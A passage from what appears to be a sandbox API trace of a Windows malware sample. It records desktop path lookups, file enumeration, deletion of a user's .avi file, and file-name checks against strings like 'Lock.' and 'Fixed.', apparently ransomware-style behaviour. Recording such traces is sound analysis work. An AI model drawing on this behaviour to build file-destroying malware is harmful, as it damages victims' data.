(HeapHandle=0x25c0000, Flags=0x0, Size=0x6e) returned 0x240c948 [0188.097] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/md6gSAuODLhq.avi", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\md6gSAuODLhq.avi", lpFilePart=0x8bedfc*="md6gSAuODLhq.avi") returned 0x36 [0188.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c948 | out: hHeap=0x25c0000) returned 1 [0188.097] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\md6gSAuODLhq.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\md6gsauodlhq.avi")) returned 0x20 [0188.097] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\md6gSAuODLhq.avi", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9caadd70, ftCreationTime.dwHighDateTime=0x1d4c5ab, ftLastAccessTime.dwLowDateTime=0x48e7a230, ftLastAccessTime.dwHighDateTime=0x1d4d191, ftLastWriteTime.dwLowDateTime=0x48e7a230, ftLastWriteTime.dwHighDateTime=0x1d4d191, nFileSizeHigh=0x0, nFileSizeLow=0x7acb, dwReserved0=0x61, dwReserved1=0x4, cFileName="md6gSAuODLhq.avi", cAlternateFileName="MD6GSA~1.AVI")) returned 0xaa5920 [0188.098] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\md6gSAuODLhq.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\md6gsauodlhq.avi")) returned 1 [0188.104] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9caadd70, ftCreationTime.dwHighDateTime=0x1d4c5ab, ftLastAccessTime.dwLowDateTime=0x48e7a230, ftLastAccessTime.dwHighDateTime=0x1d4d191, ftLastWriteTime.dwLowDateTime=0x48e7a230, ftLastWriteTime.dwHighDateTime=0x1d4d191, nFileSizeHigh=0x0, nFileSizeLow=0x7acb, dwReserved0=0x61, dwReserved1=0x4, cFileName="md6gSAuODLhq.avi", cAlternateFileName="MD6GSA~1.AVI")) returned 0 [0188.104] FindClose (in: hFindFile=0xaa5920 | out: hFindFile=0xaa5920) returned 1 [0188.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0188.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0188.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0188.104] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0188.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0188.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0188.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0188.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0188.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0188.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0188.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0188.105] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0188.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0188.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0188.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0188.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0188.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0188.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0188.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0188.106] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0188.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0188.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0188.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0188.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0188.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0188.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0188.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0188.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0188.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0188.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0188.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0188.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0188.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0188.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe0) returned 0x2416f30 [0188.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0188.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0188.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0188.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0188.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0188.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0188.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0188.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0188.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6e) returned 0x240c948 [0188.108] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/md6gSAuODLhq.avi", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\md6gSAuODLhq.avi", lpFilePart=0x8bf658*="md6gSAuODLhq.avi") returned 0x36 [0188.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c948 | out: hHeap=0x25c0000) returned 1 [0188.108] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\md6gSAuODLhq.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\md6gsauodlhq.avi")) returned 0xffffffff [0188.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0188.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0188.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0188.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0188.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0188.109] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0188.109] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.109] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0188.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0188.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0188.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0188.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0188.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0188.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0188.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0188.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0188.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nJNF.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JNF.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0188.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NF.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0188.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0188.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0188.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0188.110] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0188.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0188.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0188.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0188.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nJNF.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JNF.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NF.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.110] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0188.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0188.111] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0188.111] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0188.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0188.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0188.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0188.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0188.111] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0188.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0188.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0188.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0188.111] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0188.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0188.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0188.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b88 [0188.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0188.111] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0188.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0188.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0188.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0188.112] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0188.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0188.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0188.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0188.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0188.112] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0188.112] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.112] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0188.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0188.112] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0188.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0188.112] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0188.113] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0188.113] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/nJNF.png", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc83500, ftCreationTime.dwHighDateTime=0x1d4ce85, ftLastAccessTime.dwLowDateTime=0x243a210, ftLastAccessTime.dwHighDateTime=0x1d4c9fe, ftLastWriteTime.dwLowDateTime=0x243a210, ftLastWriteTime.dwHighDateTime=0x1d4c9fe, nFileSizeHigh=0x0, nFileSizeLow=0x3776, dwReserved0=0xb450006, dwReserved1=0xefc3, cFileName="nJNF.png", cAlternateFileName="")) returned 0xaa5920 [0188.113] FindClose (in: hFindFile=0xaa5920 | out: hFindFile=0xaa5920) returned 1 [0188.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0188.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0188.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.114] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0188.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0188.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0188.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0188.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0188.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0188.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0188.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0188.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0188.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0188.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.115] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0188.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0188.115] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0188.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0188.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0188.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0188.116] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, 